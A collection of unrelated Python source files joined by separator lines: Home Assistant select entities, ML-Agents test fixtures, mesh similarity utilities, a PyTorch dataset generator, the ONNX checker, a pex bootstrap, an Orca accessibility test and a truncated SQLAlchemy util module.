none_on_template_error=True,
)
self.add_template_attribute(
"_attr_options",
self._options_template,
validator=vol.All(cv.ensure_list, [cv.string]),
none_on_template_error=True,
)
if self._name_template and not self._name_template.is_static:
self.add_template_attribute("_attr_name", self._name_template, cv.string)
await super().async_added_to_hass()
async def async_select_option(self, option: str) -> None:
"""Change the selected option."""
if self._optimistic:
self._attr_current_option = option
self.async_write_ha_state()
await self._command_select_option.async_run(
{ATTR_OPTION: option}, context=self._context
)
class TriggerSelectEntity(TriggerEntity, SelectEntity):
"""Select entity based on trigger data."""
domain = SELECT_DOMAIN
extra_template_keys = (CONF_STATE,)
extra_template_keys_complex = (ATTR_OPTIONS,)
def __init__(
self,
hass: HomeAssistant,
coordinator: TriggerUpdateCoordinator,
config: dict,
) -> None:
"""Initialize the entity."""
super().__init__(hass, coordinator, config)
domain = __name__.split(".")[-2]
self._command_select_option = Script(
hass,
config[CONF_SELECT_OPTION],
self._rendered.get(CONF_NAME, DEFAULT_NAME),
domain,
)
@property
def current_option(self) -> str | None:
"""Return the currently selected option."""
return self._rendered.get(CONF_STATE)
@property
def options(self) -> list[str]:
"""Return the list of available options."""
return self._rendered.get(ATTR_OPTIONS, [])
async def async_select_option(self, option: str) -> None:
"""Change the selected option."""
if self._config[CONF_OPTIMISTIC]:
self._attr_current_option = option
self.async_write_ha_state()
await self._command_select_option.async_run(
{ATTR_OPTION: option}, context=self._context
)
|
from typing import List, Tuple
from mlagents_envs.base_env import SensorSpec, DimensionProperty
import pytest
import copy
import os
from mlagents.trainers.settings import (
TrainerSettings,
PPOSettings,
SACSettings,
GAILSettings,
CuriositySettings,
RewardSignalSettings,
NetworkSettings,
TrainerType,
RewardSignalType,
ScheduleType,
)
CONTINUOUS_DEMO_PATH = os.path.dirname(os.path.abspath(__file__)) + "/test.demo"
DISCRETE_DEMO_PATH = os.path.dirname(os.path.abspath(__file__)) + "/testdcvis.demo"
_PPO_CONFIG = TrainerSettings(
trainer_type=TrainerType.PPO,
hyperparameters=PPOSettings(
learning_rate=5.0e-3,
learning_rate_schedule=ScheduleType.CONSTANT,
batch_size=16,
buffer_size=64,
),
network_settings=NetworkSettings(num_layers=1, hidden_units=32),
summary_freq=500,
max_steps=3000,
threaded=False,
)
_SAC_CONFIG = TrainerSettings(
trainer_type=TrainerType.SAC,
hyperparameters=SACSettings(
learning_rate=5.0e-3,
learning_rate_schedule=ScheduleType.CONSTANT,
batch_size=8,
buffer_init_steps=100,
buffer_size=5000,
tau=0.01,
init_entcoef=0.01,
),
network_settings=NetworkSettings(num_layers=1, hidden_units=16),
summary_freq=100,
max_steps=1000,
threaded=False,
)
def ppo_dummy_config():
return copy.deepcopy(_PPO_CONFIG)
def sac_dummy_config():
return copy.deepcopy(_SAC_CONFIG)
@pytest.fixture
def gail_dummy_config():
return {RewardSignalType.GAIL: GAILSettings(demo_path=CONTINUOUS_DEMO_PATH)}
@pytest.fixture
def curiosity_dummy_config():
return {RewardSignalType.CURIOSITY: CuriositySettings()}
@pytest.fixture
def extrinsic_dummy_config():
return {RewardSignalType.EXTRINSIC: RewardSignalSettings()}
def create_sensor_specs_with_shapes(shapes: List[Tuple[int, ...]]) -> List[SensorSpec]:
sen_spec: List[SensorSpec] = []
for shape in shapes:
dim_prop = (DimensionProperty.UNSPECIFIED,) * len(shape)
spec = SensorSpec(shape, dim_prop)
sen_spec.append(spec)
return sen_spec
|
a, b, c = map(int, input().split())
d = int(input())
sec = (c + d) % 60
rest_min = (c + d) // 60
minute = (b + rest_min) % 60
rest_hour = (b + rest_min) // 60
hour = (a + rest_hour) % 24
print(f'{hour} {minute} {sec}')
|
import math
import meshlabxml
import os
import tempfile
import plyfile
import numpy as np
import numba
import binvox_rw
import subprocess
def print_hausdorff(hausdorff_distance):
for key, value in hausdorff_distance.items():
print('{}: {}'.format(key, value))
@numba.njit
def minmax(array):
# Ravel the array and return early if it's empty
array = array.ravel()
length = array.size
if not length:
return
# We want to process two elements at once so we need
# an even sized array, but we preprocess the first and
# start with the second element, so we want it "odd"
odd = length % 2
if not odd:
length -= 1
# Initialize min and max with the first item
minimum = maximum = array[0]
i = 1
while i < length:
# Get the next two items and swap them if necessary
x = array[i]
y = array[i+1]
if x > y:
x, y = y, x
# Compare the min with the smaller one and the max
# with the bigger one
minimum = min(x, minimum)
maximum = max(y, maximum)
i += 2
# If we had an even sized array we need to compare the
# one remaining item too.
if not odd:
x = array[length]
minimum = min(x, minimum)
maximum = max(x, maximum)
return minimum, maximum
def hausdorff_distance_one_direction(mesh1_filepath, mesh2_filepath):
script = meshlabxml.create.FilterScript(file_in=[mesh1_filepath, mesh2_filepath], ml_version='1.3.2')
meshlabxml.sampling.hausdorff_distance(script)
script.run_script(print_meshlabserver_output=False, skip_error=True)
return script.hausdorff_distance
@numba.jit
def hausdorff_distance_bi(mesh1_filepath, mesh2_filepath):
# get hausdorff dist from meshlab server
hd_ab = hausdorff_distance_one_direction(mesh1_filepath, mesh2_filepath)
hd_ba = hausdorff_distance_one_direction(mesh2_filepath, mesh1_filepath)
min_distance_bi = min(hd_ab["min_distance"], hd_ba["min_distance"])
max_distance_bi = max(hd_ab["max_distance"], hd_ba["max_distance"])
sm = hd_ab["mean_distance"] * hd_ab["number_points"] + hd_ba["mean_distance"] * hd_ba["number_points"]
mean_distance_bi = sm / (hd_ab["number_points"] + hd_ba["number_points"])
ms = (hd_ab["rms_distance"] ** 2) * hd_ab["number_points"] + (hd_ba["rms_distance"] ** 2) * hd_ba["number_points"]
rms_distance_bi = math.sqrt(ms / (hd_ab["number_points"] + hd_ba["number_points"]))
return {"min_distance": min_distance_bi,
"max_distance": max_distance_bi,
"mean_distance": mean_distance_bi,
"rms_distance": rms_distance_bi,
"number_points": hd_ab["number_points"]}
@numba.jit
def calculate_voxel_side_length(mesh, grid_size):
minx, maxx = minmax(mesh.vertices[:, 0])
miny, maxy = minmax(mesh.vertices[:, 1])
minz, maxz = minmax(mesh.vertices[:, 2])
return max(abs(minx - maxx) / grid_size,
abs(miny - maxy) / grid_size,
abs(minz - maxz) / grid_size)
@numba.jit
def _jaccard_distance(grid1, grid2):
intersection = np.logical_and(grid1, grid2)
intersection_count = np.count_nonzero(intersection)
union = np.logical_or(grid1, grid2)
union_count = np.count_nonzero(union)
if union_count == 0:
return 0.0
return float(intersection_count) / float(union_count)
def jaccard_similarity(mesh_filepath0, mesh_filepath1, grid_size=40, exact=True):
temp_mesh0_filepath = tempfile.mktemp(suffix=".ply")
temp_mesh1_filepath = tempfile.mktemp(suffix=".ply")
binvox0_filepath = temp_mesh0_filepath.replace(".ply", ".binvox")
binvox1_filepath = temp_mesh1_filepath.replace(".ply", ".binvox")
os.symlink(os.path.abspath(mesh_filepath0), temp_mesh0_filepath)
os.symlink(os.path.abspath(mesh_filepath1), temp_mesh1_filepath)
mesh0 = plyfile.PlyData.read(temp_mesh0_filepath)
minx, maxx = minmax(mesh0['vertex']['x'])
miny, maxy = minmax(mesh0['vertex']['y'])
minz, maxz = minmax(mesh0['vertex']['z'])
# -d: specify voxel grid size (default 256, max 1024)(no max when using -e)
# -e: exact voxelization (any voxel with part of a triangle gets set)(does not use graphics card)
# -bb <minx> <miny> <minz> <maxx> <maxy> <maxz>: force a different input model bounding box
cmd_base = "binvox -pb "
if exact:
cmd_base += "-e "
cmd_base += "-d " + str(grid_size) + " -bb " + str(minx) + " " + str(miny) + " " + str(minz) + " " + str(maxx) + " " + str(maxy) + " " + str(maxz)
mesh0_cmd = cmd_base + " " + temp_mesh0_filepath
mesh1_cmd = cmd_base + " " + temp_mesh1_filepath
process = subprocess.Popen(mesh0_cmd.split(" "), stdout=subprocess.PIPE)
command1_output, _ = process.communicate()
process = subprocess.Popen(mesh1_cmd.split(" "), stdout=subprocess.PIPE)
command2_output, _ = process.communicate()
with open(binvox0_filepath, 'r') as mesh0_binvox_file:
mesh0_binvox = binvox_rw.read_as_3d_array(mesh0_binvox_file)
with open(binvox1_filepath, 'r') as mesh1_binvox_file:
mesh1_binvox = binvox_rw.read_as_3d_array(mesh1_binvox_file)
jaccard = _jaccard_distance(mesh0_binvox.data, mesh1_binvox.data)
if os.path.exists(temp_mesh0_filepath):
os.remove(temp_mesh0_filepath)
if os.path.exists(temp_mesh1_filepath):
os.remove(temp_mesh1_filepath)
if os.path.exists(binvox0_filepath):
os.remove(binvox0_filepath)
if os.path.exists(binvox1_filepath):
os.remove(binvox1_filepath)
return jaccard
|
from datetime import datetime, date, time, timedelta
from .model import TestingMixin
from .util import testing_config, truncate, Matcher, near, let, one_of
__all__ = [
"TestingMixin",
"testing_config",
"truncate",
"near",
"let",
"one_of",
]
|
import math
from typing import Callable, Union, Dict, Tuple, Optional
import torch
import torch.utils.data
# import Dataset, DataLoader
class InpData(torch.utils.data.Dataset):
""""""
def __init__(self, X, Y):
# self.X = torch.from_numpy(X).float()
# self.Y = torch.from_numpy(Y).float()
self.X = X
self.Y = Y
def __len__(self):
return self.X.shape[0]
def __getitem__(self, idx):
return self.X[idx], self.Y[idx]
def random_classification(s, d, batch_size):
inputs = torch.randn(s, d)
labels = torch.randint(2, (s,))
datasets = {'train': InpData(inputs, labels),
'val': InpData(inputs, labels)}
dataloaders = {x: torch.utils.data.DataLoader(datasets[x], batch_size=batch_size, shuffle=True, num_workers=1,
drop_last=True)
for x in ['train', 'val']}
return dataloaders
def data(num_trials: int, n_time: int, num_receptive_fields: Union[int, Tuple[Tuple[int]]], tau: int = 1000,
latents: Tuple[Tuple[str]] = (('x',), ('y',), ('theta',)), num_peaks: Optional[Tuple[int]] = None,
peak_width_factors: Optional[Union[Tuple[Tuple[float]], float]] = 0.1, sigma_mult: float = 0.,
sigma_add: float = 0.):
"""To have a smooth motion it the timescale and the variance of the field need to match. Roughly this means that
tau^2~Inp_dim.
Parameters
----------
num_trials : int
n_time : int
num_receptive_fields : Union[int, Tuple[Tuple[int]]]
tau : int
latents : Tuple[Tuple[str]]
num_peaks : Optional[Tuple[int]]
peak_width_factors : Optional[Tuple[float]]
sigma_mult : float
sigma_add : float
frozen_epochs : bool
Whether or not the input set is the same across epochs. If this is false, input samples are like online learning
-- you never get the same input sample twice, even across epochs.
Returns
-------
"""
if not hasattr(num_receptive_fields, '__len__'):
d = num_receptive_fields
num_receptive_fields = []
for i0 in range(len(latents)):
num_receptive_fields.append([])
for i1 in range(len(latents[i0])):
num_receptive_fields[i0].append(d)
def circular_distances(i, j, circular=False):
cdist = torch.cdist
j = j.reshape(-1, 1)
i = i.reshape(-1, 1)
dists = cdist(j, i)
if circular:
dists = torch.min(torch.remainder(dists, 1), torch.remainder(1 - dists, 1))
return dists
responses = []
latent_vals = []
for i0, latent_group in enumerate(latents):
latent_vals_group = []
len_latents = len(latent_group)
p = 1
for x in num_receptive_fields[i0]:
p = p * x
dists = torch.zeros(num_trials * n_time, p, len_latents)
temp = [torch.linspace(0, 1 - 1 / num_receptive_fields[i0][i1], num_receptive_fields[i0][i1]) for i1 in
range(len_latents)]
out = torch.meshgrid(temp)
receptive_field_centers = torch.stack(out, dim=-1).reshape(-1, len_latents)
for i1, x in enumerate(latent_group):
if x == 'theta':
circular = True
tau_eff = tau
elif x == 'x':
circular = False
# tau_eff = 2*tau
tau_eff = tau
else:
raise AttributeError("Latent variable not recognized.")
if hasattr(peak_width_factors, '__len__'):
sigma = peak_width_factors[i0][i1]
else:
sigma = peak_width_factors
latent_val = torch.zeros((num_trials, n_time))
latent_val[:, 0] = torch.rand(num_trials)
print
for i_time in range(1, n_time):
if tau == 0:
latent_val[:, i_time] = torch.rand(num_trials)
else:
temp = (1 / math.sqrt(tau_eff)) * torch.randn(num_trials)
latent_val[:, i_time] = latent_val[:, i_time - 1] + temp
# theta[:, i_time, :] = theta[:, i_time - 1, :] + 1 / np.sqrt(tau) * np.random.randn(num_trials, 1)
# a = latent_val.clone()
if not circular:
latent_val = torch.abs(torch.remainder(2 * latent_val, 2) - 1)
else:
latent_val = torch.remainder(latent_val, 1)
latent_vals_group.append(latent_val)
# dx = 1 / Inp_dim
# receptive_field_centers = torch.linspace(0, 1 - dx, Inp_dim)
dist_x = circular_distances(receptive_field_centers[:, i1].unsqueeze(dim=-1), latent_val, circular)
dists[:, :, i1] = dist_x
latent_vals.append(latent_vals_group)
dist_sq_final = torch.sum(dists ** 2, dim=-1).reshape((num_trials, n_time, p))
# responses.append(0.1 * torch.exp(-dist_sq_final / sigma ** 2))
responses.append(torch.exp(-dist_sq_final / sigma ** 2))
responses = torch.cat(responses, dim=-1)
# from matplotlib import pyplot as plt
# plt.figure()
# idx = 200
# plt.scatter(latent_vals[0][0][0], latent_vals[0][1][0], c=responses[0, :, idx]);
# plt.show()
if sigma_add != 0:
responses = responses + sigma_add * torch.randn(*responses.shape)
responses = 0.1 * responses
return responses, responses, latent_vals
def dataset(num_trials: int, n_time: int, Inp_dim: int, tau: int = 1000,
latents: Tuple[Tuple[str]] = (('x',), ('y',), ('theta',)), num_peaks: Optional[Tuple[int]] = None,
peak_width_factors: Optional[Union[Tuple[Tuple[float]], float]] = 0.1, sigma_mult: float = 0.,
sigma_add: float = 0., freeze_epochs: bool = True, train_perc: float = 0.8, return_latents: bool = False):
if not freeze_epochs:
raise AttributeError("freeze_epochs=False option isn't implemented yet")
else:
# class LatentVariableReceptiveFieldEncoding(torch.utils.data.Dataset):
# def __init__(self):
# pass
inputs, targets, latent_vals = data(num_trials, n_time, Inp_dim, tau, latents, num_peaks, peak_width_factors,
sigma_mult, sigma_add)
train_time = int(round(train_perc * n_time))
train_inputs = inputs[:, :train_time]
train_inputs = train_inputs.reshape(-1, train_inputs.shape[-1])
val_inputs = inputs[:, train_time:]
val_inputs = val_inputs.reshape(-1, val_inputs.shape[-1])
train_targets = targets[:, :train_time]
train_targets = train_targets.reshape(-1, train_targets.shape[-1])
val_targets = targets[:, train_time:]
val_targets = val_targets.reshape(-1, val_targets.shape[-1])
train_dataset = InpData(train_inputs, train_targets)
val_dataset = InpData(val_inputs, val_targets)
train_latent_vals = []
val_latent_vals = []
for group in latent_vals:
train_latent_vals.append([])
val_latent_vals.append([])
for x in group:
train_latent_vals[-1].append(x[:, :train_time].reshape(-1))
val_latent_vals[-1].append(x[:, train_time:].reshape(-1))
if return_latents:
return train_dataset, val_dataset, train_latent_vals, val_latent_vals
else:
return train_dataset, val_dataset
if __name__ == '__main__':
# out = data(4, 100, 20, tau=0, sigma_mult=0,
# sigma_add=0.00, latents=(('theta', 'x'), ('x',)))[0]
out = dataset(4, 120, 20, tau=0, latents=(('theta', 'x'), ('x',)), sigma_mult=0, sigma_add=0.00)
print
|
# SPDX-License-Identifier: Apache-2.0
"""onnx checker
This implements graphalities that allows us to check whether a serialized
proto is legal.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import functools
from onnx import (ValueInfoProto,
AttributeProto,
TensorProto,
SparseTensorProto,
NodeProto,
ModelProto,
GraphProto,
IR_VERSION)
import onnx.onnx_cpp2py_export.checker as C
import onnx.defs
from google.protobuf.message import Message
from typing import TypeVar, Callable, Any, Type, cast, Union, Text
import onnx.shape_inference
import sys
# Limitation of single protobuf file is 2GB
MAXIMUM_PROTOBUF = 2000000000
# TODO: This thing where we reserialize the protobuf back into the
# string, only to deserialize it at the call site, is really goofy.
# Stop doing that.
# NB: Please don't edit this context!
DEFAULT_CONTEXT = C.CheckerContext()
DEFAULT_CONTEXT.ir_version = IR_VERSION
# TODO: Maybe ONNX-ML should also be defaulted?
DEFAULT_CONTEXT.opset_imports = {'': onnx.defs.onnx_opset_version()}
FuncType = TypeVar('FuncType', bound=Callable[..., Any])
# TODO: This really doesn't seem worth the metaprogramming...
def _create_checker(proto_type): # type: (Type[Message]) -> Callable[[FuncType], FuncType]
def decorator(py_func): # type: (FuncType) -> FuncType
@functools.wraps(py_func)
def checker(proto, ctx=DEFAULT_CONTEXT): # type: (Message, C.CheckerContext) -> Any
if not isinstance(proto, proto_type):
raise RuntimeError(
'You cannot pass an object that is not of type {}'.format(
proto_type.__name__))
return getattr(C, py_func.__name__)(
proto.SerializeToString(), ctx)
return cast(FuncType, checker)
return decorator
@_create_checker(ValueInfoProto)
def check_value_info(value_info, ctx=DEFAULT_CONTEXT): # type: (ValueInfoProto, C.CheckerContext) -> None
pass
@_create_checker(TensorProto)
def check_tensor(tensor, ctx=DEFAULT_CONTEXT): # type: (TensorProto, C.CheckerContext) -> None
pass
@_create_checker(AttributeProto)
def check_attribute(attr, ctx=DEFAULT_CONTEXT): # type: (AttributeProto, C.CheckerContext) -> None
pass
@_create_checker(NodeProto)
def check_node(node, ctx=DEFAULT_CONTEXT): # type: (NodeProto, C.CheckerContext) -> None
pass
@_create_checker(GraphProto)
def check_graph(graph, ctx=DEFAULT_CONTEXT): # type: (GraphProto, C.CheckerContext) -> None
pass
def check_sparse_tensor(sparse, ctx=DEFAULT_CONTEXT): # type: (SparseTensorProto, C.CheckerContext) -> None
C.check_sparse_tensor(sparse.SerializeToString(), ctx)
def check_model(model, full_check=False): # type: (Union[ModelProto, Text, bytes], bool) -> None
# If model is a path instead of ModelProto
if isinstance(model, str):
C.check_model_path(model)
if full_check:
onnx.shape_inference.infer_shapes_path(model, check_type=True, strict_mode=True)
else:
protobuf_string = model if isinstance(model, bytes) else model.SerializeToString()
# If the protobuf is larger than 2GB,
# remind users should use the model path to check
if sys.getsizeof(protobuf_string) > MAXIMUM_PROTOBUF:
raise ValueError('This protobuf of onnx model is too large (>2GB). Call check_model with model path instead.')
C.check_model(protobuf_string)
if full_check:
onnx.shape_inference.infer_shapes(model, check_type=True, strict_mode=True)
ValidationError = C.ValidationError
|
"""Zipfile entry point which supports auto-extracting itself based on zip-safety."""
from importlib import import_module
from zipfile import ZipFile, ZipInfo, is_zipfile
import os
import runpy
import sys
PY_VERSION = sys.version_info
if PY_VERSION.major >= 3:
from importlib import machinery
else:
import imp
if PY_VERSION >= (3, 2):
from os import makedirs
else:
# backported from cpython 3.8
def makedirs(name, mode=0o777, exist_ok=False):
"""makedirs(name [, mode=0o777][, exist_ok=False])
Super-mkdir; create a leaf directory and all intermediate ones. Works like
mkdir, except that any intermediate path segment (not just the rightmost)
will be created if it does not exist. If the target directory already
exists, raise an OSError if exist_ok is False. Otherwise no exception is
raised. This is recursive.
"""
head, tail = os.path.split(name)
if not tail:
head, tail = os.path.split(head)
if head and tail and not os.path.exists(head):
try:
makedirs(head, exist_ok=exist_ok)
except FileExistsError:
# Defeats race condition when another thread created the path
pass
cdir = curdir
if isinstance(tail, bytes):
cdir = bytes(curdir, "ASCII")
if tail == cdir: # xxx/newdir/. exists if xxx/newdir exists
return
try:
os.mkdir(name, mode)
except OSError:
# Cannot rely on checking for EEXIST, since the operating system
# could give priority to other errors like EACCES or EROFS
if not exist_ok or not os.path.isdir(name):
raise
try:
from site import getsitepackages
except:
def getsitepackages(prefixes=[sys.prefix, sys.exec_prefix]):
"""Returns a list containing all global site-packages directories.
For each directory present in ``prefixes`` (or the global ``PREFIXES``),
this function will find its `site-packages` subdirectory depending on the
system environment, and will return a list of full paths.
"""
sitepackages = []
seen = set()
if prefixes is None:
prefixes = PREFIXES
for prefix in prefixes:
if not prefix or prefix in seen:
continue
seen.add(prefix)
if os.sep == '/':
sitepackages.append(os.path.join(prefix, "lib",
"python%d.%d" % sys.version_info[:2],
"site-packages"))
else:
sitepackages.append(prefix)
sitepackages.append(os.path.join(prefix, "lib", "site-packages"))
return sitepackages
# Put this pex on the path before anything else.
PEX = os.path.abspath(sys.argv[0])
# This might get overridden down the line if the pex isn't zip-safe.
PEX_PATH = PEX
sys.path = [PEX_PATH] + sys.path
# These will get templated in by the build rules.
MODULE_DIR = '__MODULE_DIR__'
ENTRY_POINT = '__ENTRY_POINT__'
ZIP_SAFE = __ZIP_SAFE__
PEX_STAMP = '__PEX_STAMP__'
# Workaround for https://bugs.python.org/issue15795
class ZipFileWithPermissions(ZipFile):
""" Custom ZipFile class handling file permissions. """
def _extract_member(self, member, targetpath, pwd):
if not isinstance(member, ZipInfo):
member = self.getinfo(member)
targetpath = super(ZipFileWithPermissions, self)._extract_member(
member, targetpath, pwd
)
attr = member.external_attr >> 16
if attr != 0:
os.chmod(targetpath, attr)
return targetpath
class SoImport(object):
"""So import. Much binary. Such dynamic. Wow."""
def __init__(self):
if PY_VERSION.major < 3:
self.suffixes = {x[0]: x for x in imp.get_suffixes() if x[2] == imp.C_EXTENSION}
else:
self.suffixes = machinery.EXTENSION_SUFFIXES # list, as importlib will not be using the file description
self.suffixes_by_length = sorted(self.suffixes, key=lambda x: -len(x))
# Identify all the possible modules we could handle.
self.modules = {}
if is_zipfile(sys.argv[0]):
zf = ZipFileWithPermissions(sys.argv[0])
for name in zf.namelist():
path, _ = self.splitext(name)
if path:
if path.startswith('.bootstrap/'):
path = path[len('.bootstrap/'):]
importpath = path.replace('/', '.')
self.modules.setdefault(importpath, name)
if path.startswith(MODULE_DIR):
self.modules.setdefault(importpath[len(MODULE_DIR)+1:], name)
if self.modules:
self.zf = zf
def find_module(self, fullname, path=None):
"""Attempt to locate module. Returns self if found, None if not."""
if fullname in self.modules:
return self
def load_module(self, fullname):
"""Actually load a module that we said we'd handle in find_module."""
import tempfile
filename = self.modules[fullname]
prefix, ext = self.splitext(filename)
with tempfile.NamedTemporaryFile(suffix=ext, prefix=os.path.basename(prefix)) as f:
f.write(self.zf.read(filename))
f.flush()
if PY_VERSION.major < 3:
suffix = self.suffixes[ext]
mod = imp.load_module(fullname, None, f.name, suffix)
else:
mod = machinery.ExtensionFileLoader(fullname, f.name).load_module()
# Make it look like module came from the original location for nicer tracebacks.
mod.__file__ = filename
return mod
def splitext(self, path):
"""Similar to os.path.splitext, but splits our longest known suffix preferentially."""
for suffix in self.suffixes_by_length:
if path.endswith(suffix):
return path[:-len(suffix)], suffix
return None, None
class ModuleDirImport(object):
"""Handles imports to a directory equivalently to them being at the top level.
This means that if one writes `import third_party.python.six`, it's imported like `import six`,
but becomes accessible under both names. This handles both the fully-qualified import names
and packages importing as their expected top-level names internally.
"""
def __init__(self, module_dir=MODULE_DIR):
self.prefix = module_dir.replace('/', '.') + '.'
def find_module(self, fullname, path=None):
"""Attempt to locate module. Returns self if found, None if not."""
if fullname.startswith(self.prefix):
return self
def load_module(self, fullname):
"""Actually load a module that we said we'd handle in find_module."""
module = import_module(fullname[len(self.prefix):])
sys.modules[fullname] = module
return module
def find_distributions(self, context):
"""Return an iterable of all Distribution instances capable of
loading the metadata for packages for the indicated ``context``.
"""
try:
from importlib_metadata import Distribution
import re
except:
pass
else:
class PexDistribution(Distribution):
template = r"{path}(-.*)?\.(dist|egg)-info/{filename}"
def __init__(self, name, prefix=MODULE_DIR):
"""Construct a distribution for a pex file to the metadata directory.
:param name: A module name
:param prefix: Modules prefix
"""
self._name = name
self._prefix = prefix
def _match_file(self, name, filename):
if re.match(
self.template.format(
path=os.path.join(self._prefix, self._name),
filename=filename,
),
name,
):
return name
def read_text(self, filename):
if is_zipfile(sys.argv[0]):
zf = ZipFileWithPermissions(sys.argv[0])
for name in zf.namelist():
if name and self._match_file(name, filename):
return zf.read(name).decode(encoding="utf-8")
read_text.__doc__ = Distribution.read_text.__doc__
def _has_distribution(self):
if is_zipfile(sys.argv[0]):
zf = ZipFileWithPermissions(sys.argv[0])
for name in zf.namelist():
if name and self._match_file(name, ""):
return True
if context.name in sys.modules:
distribution = PexDistribution(context.name)
if distribution._has_distribution():
yield distribution
def get_code(self, fullname):
module = self.load_module(fullname)
return module.__loader__.get_code(fullname)
def add_module_dir_to_sys_path(dirname):
"""Adds the given dirname to sys.path if it's nonempty."""
if dirname:
sys.path = sys.path[:1] + [os.path.join(sys.path[0], dirname)] + sys.path[1:]
sys.meta_path.insert(0, ModuleDirImport(dirname))
def pex_basepath(temp=False):
if temp:
import tempfile
return tempfile.mkdtemp(dir=os.environ.get('TEMP_DIR'), prefix='pex_')
else:
return os.environ.get('PEX_CACHE_DIR',os.path.expanduser('~/.cache/pex'))
def pex_uniquedir():
return 'pex-%s' % PEX_STAMP
def pex_paths():
no_cache = os.environ.get('PEX_NOCACHE')
no_cache = no_cache and no_cache.lower() == 'true'
basepath, uniquedir = pex_basepath(no_cache), pex_uniquedir()
pex_path = os.path.join(basepath, uniquedir)
return pex_path, basepath, uniquedir, no_cache
def explode_zip():
"""Extracts the current pex to a temp directory where we can import everything from.
This is primarily used for binary extensions which can't be imported directly from
inside a zipfile.
"""
# Temporarily add bootstrap to sys path
sys.path = [os.path.join(sys.path[0], '.bootstrap')] + sys.path[1:]
import contextlib, portalocker
sys.path = sys.path[1:]
@contextlib.contextmanager
def pex_lockfile(basepath, uniquedir):
# Acquire the lockfile.
lockfile_path = os.path.join(basepath, '.lock-%s' % uniquedir)
lockfile = open(lockfile_path, "a+")
# Block until we can acquire the lockfile.
portalocker.lock(lockfile, portalocker.LOCK_EX)
lockfile.seek(0)
yield lockfile
portalocker.lock(lockfile, portalocker.LOCK_UN)
@contextlib.contextmanager
def _explode_zip():
# We need to update the actual variable; other modules are allowed to look at
# these variables to find out what's going on (e.g. are we zip-safe or not).
global PEX_PATH
PEX_PATH, basepath, uniquedir, no_cache = pex_paths()
makedirs(basepath, exist_ok=True)
with pex_lockfile(basepath, uniquedir) as lockfile:
if len(lockfile.read()) == 0:
import compileall, zipfile
makedirs(PEX_PATH, exist_ok=True)
with ZipFileWithPermissions(PEX, "r") as zf:
zf.extractall(PEX_PATH)
if not no_cache: # Don't bother optimizing; we're deleting this when we're done.
compileall.compile_dir(PEX_PATH, optimize=2, quiet=1)
# Writing nonempty content to the lockfile will signal to subsequent invocations
# that the cache has already been prepared.
lockfile.write("pex unzip completed")
sys.path = [PEX_PATH] + [x for x in sys.path if x != PEX]
yield
if no_cache:
import shutil
shutil.rmtree(basepath)
return _explode_zip
def profile(filename):
"""Returns a context manager to perform profiling while the program runs.
This is triggered by setting the PEX_PROFILE_FILENAME env var to the destination file,
at which point this will be invoked automatically at pex startup.
"""
import contextlib, cProfile
@contextlib.contextmanager
def _profile():
profiler = cProfile.Profile()
profiler.enable()
yield
profiler.disable()
sys.stderr.write('Writing profiler output to %s\n' % filename)
profiler.dump_stats(filename)
return _profile
# This must be redefined/implemented when the pex is built for debugging.
# The `DEBUG_PORT` environment variable should be used if the debugger is
# to be used as a server.
def start_debugger():
pass
def main():
"""Runs the 'real' entry point of the pex.
N.B. This gets redefined by pex_test_main to run tests instead.
"""
# Starts a debugging session, if defined, before running the entry point.
start_debugger()
# Must run this as __main__ so it executes its own __name__ == '__main__' block.
runpy.run_module(ENTRY_POINT, run_name='__main__')
return 0 # unless some other exception gets raised, we're successful.
|
#!/usr/bin/python
from macaroon.playback import *
import utils
sequence = MacroSequence()
sequence.append(utils.StartRecordingAction())
sequence.append(WaitForWindowActivate("ToolStripProgressBar control",None))
sequence.append(utils.AssertPresentationAction(
"button focus",
["BRAILLE LINE: 'ToolStripProgressBar Sample Frame'",
" VISIBLE: 'ToolStripProgressBar Sample Fram', cursor=1",
"BRAILLE LINE: 'button1 Button'",
" VISIBLE: 'button1 Button', cursor=1",
"SPEECH OUTPUT: 'ToolStripProgressBar Sample frame'",
"SPEECH OUTPUT: ''",
"SPEECH OUTPUT: 'button1 button'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Return"))
sequence.append(utils.AssertPresentationAction(
"press enter to increase the value",
[""]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_9"))
sequence.append(utils.AssertPresentationAction(
"flatreview lndn to see the value",
["BRAILLE LINE: 'It is 20% of 100%'",
" VISIBLE: 'It is 20% of 100%', cursor=1",
"SPEECH OUTPUT: 'It is 20% of 100%'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_9"))
sequence.append(utils.AssertPresentationAction(
"flatreview lndn to see the next line",
["BRAILLE LINE: 'Progress 20%'",
" VISIBLE: 'Progress 20%', cursor=1",
"SPEECH OUTPUT: 'progress bar 20 percent.'"]))
sequence.append(utils.AssertionSummaryAction())
sequence.start()
|
# util/__init__.py
# Copyright (C) 2005-2018 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from .compat import callable, cmp, reduce, \
threading, py3k, py33, py36, py2k, jython, pypy, cpython, win32, \
pickle, dottedgetter, parse_qsl, namedtuple, next, reraise, \
raise_from_cause, text_type, safe_kwarg, string_types, int_types, \
binary_type, nested, \
quote_plus, with_metaclass, print_, itertools_filterfalse, u, ue, b,\
unquote_plus, unquote, b64decode, b64encode, byte_buffer, itertools_filter,\
iterbytes, StringIO, inspect_getargspec, zip_longest
from ._collections import KeyedTuple, ImmutableContainer, immutabledict, \
Properties, OrderedProperties, ImmutableProperties, OrderedDict, \
OrderedSet, IdentitySet, OrderedIdentitySet, column_set, \
column_dict, ordered_column_set, populate_column_dict, unique_list, \
UniqueAppender, PopulateDict, EMPTY_SET, to_list, to_set, \
to_column_set, update_copy, flatten_iterator, has_intersection, \
LRUCache, ScopedRegistry, ThreadLocalRegistry, WeakSequence, \
coerce_generator_arg, lightweight_named_tuple, collections_abc
from .langhelpers import iterate_attributes, class_hierarchy, \
portable_instancemethod, unbound_method_to_callable, \
getargspec_init, format_argspec_init, format_argspec_plus, \
get_func_kwargs, get_cls_kwargs, decorator, as_interface, \
memoized_property, memoized_instancemethod, md5_hex, \
group_expirable_memoized_property, dependencies, decode_slice, \
monkeypatch_proxied_specials, asbool, bool_or_str, coerce_kw_type,\
duck_type_collection, assert_arg_type, symbol, dictlike_iteritems,\
classproperty, set_creation_order, warn_exception, warn, NoneType,\
constructor_copy, methods_equivalent, chop_traceback, asint,\
